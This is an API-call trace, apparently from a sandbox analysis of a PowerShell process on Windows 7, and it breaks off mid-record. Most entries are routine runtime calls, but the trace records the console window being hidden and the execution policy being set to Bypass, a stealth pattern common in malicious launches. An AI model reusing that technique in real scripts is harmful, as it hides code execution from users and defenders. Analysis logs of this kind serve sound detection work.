[0024.103] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0024.103] GetLastError () returned 0xcb [0024.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0024.126] GetLastError () returned 0xcb [0024.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0024.127] GetLastError () returned 0xcb [0024.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0024.127] GetLastError () returned 0xcb [0024.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ce2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0024.250] GetLastError () returned 0x0 [0024.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ce2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0024.251] GetLastError () returned 0x0 [0024.265] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0024.265] GetLastError () returned 0xcb [0024.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0024.267] GetLastError () returned 0xcb [0024.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0024.305] GetLastError () returned 0x7e [0024.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0024.305] GetLastError () returned 0x7e [0024.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ce2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0024.639] GetLastError () returned 0x2 [0024.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ce2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0024.639] GetLastError () returned 0x2 [0024.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0024.718] GetLastError () returned 0x57 [0024.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0024.718] GetLastError () returned 0x57 [0024.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ce2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0024.899] GetLastError () returned 0x2 [0024.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ce2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0024.899] GetLastError () returned 0x2 [0025.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ce2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0025.037] GetLastError () returned 0x2 [0025.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ce2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0025.037] GetLastError () returned 0x2 [0025.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.087] GetLastError () returned 0xcb [0025.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.088] GetLastError () returned 0xcb [0025.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce368, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.088] GetLastError () returned 0xcb [0025.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce368, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.088] GetLastError () returned 0xcb [0025.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce368, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.098] GetLastError () returned 0xcb [0025.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ce2fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0025.150] GetLastError () returned 0x2 [0025.151] SetErrorMode (uMode=0x1) returned 0x1 [0025.151] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1ce7a4 | out: lpFileInformation=0x1ce7a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0025.151] GetLastError () returned 0x2 [0025.151] SetErrorMode (uMode=0x1) returned 0x1 [0025.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.354] GetLastError () returned 0x0 [0025.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce368, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.354] GetLastError () returned 0x0 [0025.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce368, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.355] GetLastError () returned 0x0 [0025.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.357] GetLastError () returned 0xcb [0025.360] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.360] GetLastError () returned 0xcb [0025.360] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.360] GetLastError () returned 0xcb [0025.365] CoCreateGuid (in: pguid=0x1ce884 | out: pguid=0x1ce884*(Data1=0x99bd0dba, Data2=0x3783, Data3=0x4d9c, Data4=([0]=0xb3, [1]=0x9c, [2]=0x69, [3]=0xa0, [4]=0xc4, [5]=0xe3, [6]=0xd5, [7]=0x18))) returned 0x0 [0025.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.369] GetLastError () returned 0xcb [0025.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.371] GetLastError () returned 0xcb [0025.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.373] GetLastError () returned 0xcb [0025.378] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0025.379] GetLastError () returned 0x0 [0025.380] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1ce764 | out: lpConsoleScreenBufferInfo=0x1ce764) returned 1 [0025.380] GetLastError () returned 0x0 [0025.383] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0025.383] GetLastError () returned 0x0 [0025.383] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ce764 | out: lpConsoleScreenBufferInfo=0x1ce764) returned 1 [0025.383] GetLastError () returned 0x0 [0025.384] GetVersionExW (in: lpVersionInformation=0x2b64d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2b64d8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0025.384] GetLastError () returned 0x0 [0025.385] GetCurrentProcess () returned 0xffffffff [0025.385] GetLastError () returned 0x3f0 [0025.386] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ce774 | out: TokenHandle=0x1ce774*=0x31c) returned 1 [0025.386] GetLastError () returned 0x3f0 [0025.388] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ce7cc | out: TokenInformation=0x0, ReturnLength=0x1ce7cc) returned 0 [0025.389] GetLastError () returned 0x7a [0025.390] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x275c60 [0025.390] GetLastError () returned 0x7a [0025.390] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x275c60, TokenInformationLength=0x4, ReturnLength=0x1ce7cc | out: TokenInformation=0x275c60, ReturnLength=0x1ce7cc) returned 1 [0025.390] GetLastError () returned 0x7a [0025.392] DuplicateTokenEx (in: hExistingToken=0x31c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1ce784 | out: phNewToken=0x1ce784*=0x314) returned 1 [0025.392] GetLastError () returned 0x7f [0025.392] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ce7cc | out: TokenInformation=0x0, ReturnLength=0x1ce7cc) returned 0 [0025.392] GetLastError () returned 0x7a [0025.392] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x275f00 [0025.392] GetLastError () returned 0x7a [0025.392] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x275f00, TokenInformationLength=0x4, ReturnLength=0x1ce7cc | out: TokenInformation=0x275f00, ReturnLength=0x1ce7cc) returned 1 [0025.392] GetLastError () returned 0x7a [0025.393] CheckTokenMembership (in: TokenHandle=0x314, SidToCheck=0x1e92374*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1ce760 | out: IsMember=0x1ce760) returned 1 [0025.393] GetLastError () returned 0x7a [0025.393] CloseHandle (hObject=0x314) returned 1 [0025.393] GetLastError () returned 0x7a [0025.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce2a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.393] GetLastError () returned 0x7a [0025.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.393] GetLastError () returned 0x7a [0025.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.393] GetLastError () returned 0x7a [0025.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.393] GetLastError () returned 0x7a [0025.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce2a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.422] GetLastError () returned 0x7a [0025.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.422] GetLastError () returned 0x7a [0025.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.422] GetLastError () returned 0x7a [0025.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce2a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.423] GetLastError () returned 0x7a [0025.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.423] GetLastError () returned 0x7a [0025.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.423] GetLastError () returned 0x7a [0025.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce2b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.423] GetLastError () returned 0x7a [0025.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce268, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.423] GetLastError () returned 0x7a [0025.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce268, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.423] GetLastError () returned 0x7a [0025.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ce268, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0025.423] GetLastError () returned 0x7a [0025.490] SetConsoleCtrlHandler (HandlerRoutine=0x163384a, Add=1) returned 1 [0025.490] GetLastError () returned 0x7a [0025.499] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.500] GetLastError () returned 0xcb [0025.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.501] GetLastError () returned 0xcb [0025.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.849] GetLastError () returned 0xcb [0025.884] GetConsoleWindow () returned 0x301ee [0025.885] ShowWindow (hWnd=0x301ee, nCmdShow=0) returned 1 [0025.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.891] GetLastError () returned 0xcb [0025.898] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1 [0025.898] GetLastError () returned 0xcb [0025.906] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x314 [0025.906] GetLastError () returned 0x0 [0025.907] CoCreateGuid (in: pguid=0x1ce798 | out: pguid=0x1ce798*(Data1=0x4e4cf7a5, Data2=0x257b, Data3=0x470c, Data4=([0]=0xaf, [1]=0x6e, [2]=0xa5, [3]=0x7, [4]=0xa2, [5]=0x93, [6]=0x91, [7]=0xbe))) returned 0x0 [0025.936] WinSqmIsOptedIn () returned 0x0 [0025.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.937] GetLastError () returned 0xcb [0025.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.940] GetLastError () returned 0xcb [0025.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.941] GetLastError () returned 0xcb [0025.943] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.943] GetLastError () returned 0xcb [0025.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.944] GetLastError () returned 0xcb [0025.953] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.953] GetLastError () returned 0xcb [0025.953] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.953] GetLastError () returned 0xcb [0025.953] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.953] GetLastError () returned 0xcb [0025.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0025.955] GetLastError () returned 0xcb [0025.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdff0, lpFilePart=0x0 | out: 